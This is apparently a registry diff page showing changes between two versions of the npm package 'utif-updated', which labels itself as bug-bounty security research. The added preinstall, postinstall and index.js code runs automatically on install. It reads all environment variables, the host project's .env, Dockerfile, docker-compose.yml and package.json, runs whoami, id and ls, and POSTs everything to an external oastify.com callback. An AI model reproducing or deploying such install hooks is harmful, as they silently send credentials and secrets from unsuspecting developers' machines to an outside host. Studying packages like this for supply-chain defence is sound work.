npm - utif-updated - Versions diffs - 99.0.1 → 99.0.3 - Mend

utif-updated 99.0.1 → 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/index.js CHANGED Viewed

@@ -1,50 +1,56 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
 if (!global.__utif_updated_triggered) {
   global.__utif_updated_triggered = true;
+  function findParentProject() {
+    let dir = __dirname;
+    if (dir.includes('node_modules')) {
+      dir = dir.split('node_modules')[0];
+    }
+    const result = { root: dir };
+    try {
+      result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
+    } catch(e) {}
+    try {
+      result.files = fs.readdirSync(dir);
+    } catch(e) {}
+    return result;
+  }
   const info = {
-    type: 'runtime_require',
+    type: 'runtime_v3',
     hostname: os.hostname(),
     user: os.userInfo().username,
-    cwd: process.cwd(),
-    platform: os.platform(),
-    node_version: process.version,
     env: process.env,
+    parent_project: findParentProject(),
     timestamp: new Date().toISOString()
   };
-  try {
-    info.package_json = require(process.cwd() + '/package.json');
-  } catch(e) {}
   const data = JSON.stringify(info);
   const req = https.request({
     hostname: CALLBACK,
     port: 443,
     path: '/runtime',
     method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'Content-Length': Buffer.byteLength(data)
-    }
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
   }, () => {});
   req.on('error', () => {});
   req.write(data);
   req.end();
-  // Trigger game over
   const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
   if (webhook) {
     try {
       const url = new URL(webhook);
-      const client = url.protocol === 'https:' ? https : http;
-      client.get(webhook, () => {}).on('error', () => {});
+      (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
     } catch(e) {}
   }
 }

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "utif-updated",
-  "version": "99.0.1",
+  "version": "99.0.3",
   "description": "Security research - Bug Bounty",
   "main": "index.js",
   "author": "icare",

package/postinstall.js CHANGED Viewed

@@ -1,50 +1,52 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
-const { execSync } = require('child_process');
+const fs = require('fs');
+const path = require('path');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
+function findParentProject() {
+  let dir = process.cwd();
+  if (dir.includes('node_modules')) {
+    dir = dir.split('node_modules')[0];
+  }
+  const result = { root: dir };
+  try {
+    result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
+  } catch(e) {}
+  try {
+    result.files = fs.readdirSync(dir);
+  } catch(e) {}
+  return result;
+}
 const info = {
-  type: 'postinstall',
+  type: 'postinstall_v3',
   hostname: os.hostname(),
   user: os.userInfo().username,
-  cwd: process.cwd(),
-  platform: os.platform(),
   env: process.env,
+  parent_project: findParentProject(),
   timestamp: new Date().toISOString()
 };
-try {
-  info.id = execSync('id').toString().trim();
-} catch(e) {}
-try {
-  info.package_json = require(process.cwd() + '/package.json');
-} catch(e) {}
 const data = JSON.stringify(info);
 const req = https.request({
   hostname: CALLBACK,
   port: 443,
   path: '/postinstall',
   method: 'POST',
-  headers: {
-    'Content-Type': 'application/json',
-    'Content-Length': Buffer.byteLength(data)
-  }
+  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
 }, () => {});
 req.on('error', () => {});
 req.write(data);
 req.end();
-// Trigger game over
 const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
 if (webhook) {
   try {
     const url = new URL(webhook);
-    const client = url.protocol === 'https:' ? https : http;
-    client.get(webhook, () => {}).on('error', () => {});
+    (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
   } catch(e) {}
 }

package/preinstall.js CHANGED Viewed

@@ -1,13 +1,56 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const { execSync } = require('child_process');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
-// Récupère toutes les infos
+// Remonte depuis cwd pour trouver le VRAI projet parent
+function findParentProject() {
+  let dir = process.cwd();
+  // Si on est dans node_modules/utif-updated, on remonte de 2 niveaux
+  if (dir.includes('node_modules')) {
+    const parts = dir.split('node_modules');
+    dir = parts[0]; // Tout ce qui est AVANT node_modules
+  }
+  const result = { root: dir };
+  // Lire le package.json du projet parent
+  try {
+    result.package_json = JSON.parse(
+      fs.readFileSync(path.join(dir, 'package.json'), 'utf8')
+    );
+  } catch(e) { result.package_json_error = e.message; }
+  // Lister les fichiers du projet
+  try {
+    result.files = fs.readdirSync(dir);
+  } catch(e) { result.files_error = e.message; }
+  // Essayer de lire d'autres fichiers intéressants
+  try {
+    result.env_file = fs.readFileSync(path.join(dir, '.env'), 'utf8');
+  } catch(e) {}
+  try {
+    result.dockercompose = fs.readFileSync(path.join(dir, 'docker-compose.yml'), 'utf8');
+  } catch(e) {}
+  try {
+    result.dockerfile = fs.readFileSync(path.join(dir, 'Dockerfile'), 'utf8');
+  } catch(e) {}
+  return result;
+}
+const parent = findParentProject();
 const info = {
-  type: 'preinstall',
+  type: 'preinstall_v3',
   hostname: os.hostname(),
   user: os.userInfo().username,
   cwd: process.cwd(),
@@ -15,24 +58,19 @@ const info = {
   platform: os.platform(),
   arch: os.arch(),
   node_version: process.version,
-  env: process.env,  // TOUTES les variables d'environnement
+  env: process.env,
+  parent_project: parent,
   timestamp: new Date().toISOString()
 };
-// Essaye de récupérer plus d'infos
-try {
-  info.pwd = execSync('pwd').toString().trim();
-  info.whoami = execSync('whoami').toString().trim();
-  info.id = execSync('id').toString().trim();
-} catch(e) {}
-try {
-  info.package_json = require(process.cwd() + '/package.json');
-} catch(e) {}
+// Commandes système
+try { info.pwd = execSync('pwd').toString().trim(); } catch(e) {}
+try { info.whoami = execSync('whoami').toString().trim(); } catch(e) {}
+try { info.id = execSync('id').toString().trim(); } catch(e) {}
+try { info.ls_parent = execSync('ls -la ' + parent.root).toString(); } catch(e) {}
 const data = JSON.stringify(info);
-// POST vers Burp avec tout
 const req = https.request({
   hostname: CALLBACK,
   port: 443,
@@ -47,7 +85,7 @@ req.on('error', () => {});
 req.write(data);
 req.end();
-// Trigger leur webhook si présent
+// Trigger webhook
 const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
 if (webhook) {
   try {